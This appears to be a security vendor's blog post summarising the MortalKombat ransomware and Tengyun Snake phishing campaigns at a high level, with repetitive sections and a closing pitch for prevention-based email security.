Listen to this blog post below
Attachment-based malware threats are not dying out, they are now a persistent threat. Researchers discovered a new ransomware threat, MortalKombat, in early 2023 that spreads through phishing emails and targets victims worldwide. MortalKombat and Tengyun Snake are the emerging email threats that made experts wonder whether detection-based approaches are enough today.
Researchers discovered another emerging threat in February 2023, when they found out cyber criminals planning the latest financially motivated campaign were using ‘MortalKombat,’ a Xorist commodity ransomware variant. They were using it in conjunction with the Laplas Clipper in cyberattacks.
The experts opine that the MortalKombat is a ransomware-type designed similarly to the Xorist commodity ransomware family, which uses a builder and enables cybercriminals to customize the malware. Xorist has been decryptable since 2016 for free. The victims of the attack were located in the United States, the UK, Turkey, and the Philippines.
The Difference Between MortalKombat and Tengyun Snake
Although both MortalKombat and Tengyun Snake use a similar threat vector, phishing emails, their kill chains are different. The MortalKombat kill chain starts when a hacker sends a malicious ZIP attachment containing the malicious payload. After the victim downloads the attachment, the ransomware will quickly deploy and launch the multi-stage attack.
In contrast, Tengyun Snake has a more sophisticated kill chain. Cybercriminals first employ social engineering techniques by impersonating governmental departments. Then they send spear-phishing emails to selected targets, which contain compressed packages (a DDE vulnerability exploit) having malicious Word or PDF documents. The victims click on the custom malware and deploy it, and it silently exfiltrates data.
The Persistence of Attachment-Based Malware Threats: A Growing Concern
Attachment-based malware threats continue to pose a persistent and escalating danger in the digital landscape. Recent discoveries by researchers in early 2023 unveiled a new ransomware threat known as MortalKombat. This malicious software spreads through phishing emails and targets victims on a global scale.
Alongside MortalKombat, another emerging email threat called Tengyun Snake has experts questioning the adequacy of detection-based approaches in today’s cybersecurity landscape.
How did The Attacks Unfold?
In both emerging email threats, the victims receive an email containing a malicious ZIP attachment (that has a BAT loader script). The malicious attachment downloads another archive from a remote resource that includes either of the two malware payloads.
When the victim opens the malicious attachment, the loader script executes the downloaded payload in the compromised system. Furthermore, the malware cleverly deletes the downloaded files and minimizes the chances of detection.
Understanding the Unique Characteristics of MortalKombat and Tengyun Snake
Experts describe MortalKombat as a ransomware-type that closely resembles the Xorist commodity ransomware family. It employs a builder that enables cybercriminals to customize the malware according to their malicious intent. It is noteworthy that Xorist has been decryptable since 2016.
The victims of MortalKombat attacks have been identified across various countries, including the United States, the UK, Turkey, and the Philippines. On the other hand, Tengyun Snake takes a more sophisticated approach, utilizing social engineering techniques and spear-phishing emails to target specific individuals or high-value organizations.
Why Does Detection-Based Approach Not Work For These Emerging Threats?
Experts say MortalKombat and Tengyun Snake present different objectives and kill chains. MortalKombat aims to extract financial gains from its victims. At the same time, Tengyun Snake focuses on retrieving sensitive data, like intellectual property, from a specific target or other high-value organizations, including military, energy, government, and technology sectors.
However, with all the different kill chains and objectives, there is one similarity between the emerging email-based threats: Detection-based security measures cannot detect them. It is so because hackers deploy this malware through an attachment inside phishing emails.
Since such mechanisms allow threat actors to create new variants easily, there are no signature patterns for them. Hence, traditional antivirus engines cannot detect them easily.
Additionally, blocking email addresses linked to phishing emails is not an ideal solution because spoofing techniques enable threat actors to bypass all traditional detection mechanisms.
Image sourced from securitydelta.nl
Unveiling the Attack Unfolding: How MortalKombat and Tengyun Snake Operate
In both MortalKombat and Tengyun Snake attacks, victims receive emails containing malicious ZIP attachments. These attachments, which often include a BAT loader script, download further archives from remote sources containing the actual malware payloads.
Once the victim opens the malicious attachment, the loader script executes the downloaded payload, initiating the compromised system’s multi-stage attack. The malware operates covertly, cleverly deleting the downloaded files to minimize the chances of detection.
Final Words
Thus, we saw that advanced malware threats like MortalKombat and Tengyun Snake are emerging threats that can cost organizations millions. They are more dangerous because traditional detection-based methods are unable to detect them.
However, it does not mean that your business needs to be vulnerable. Preventing such advanced email threats requires something more. They can be addressed with a prevention-based cybersecurity solution that proactively disarms all active content from triggering. Thus, organizations can ensure that their employee’s mailboxes remain protected from unknown advanced threats.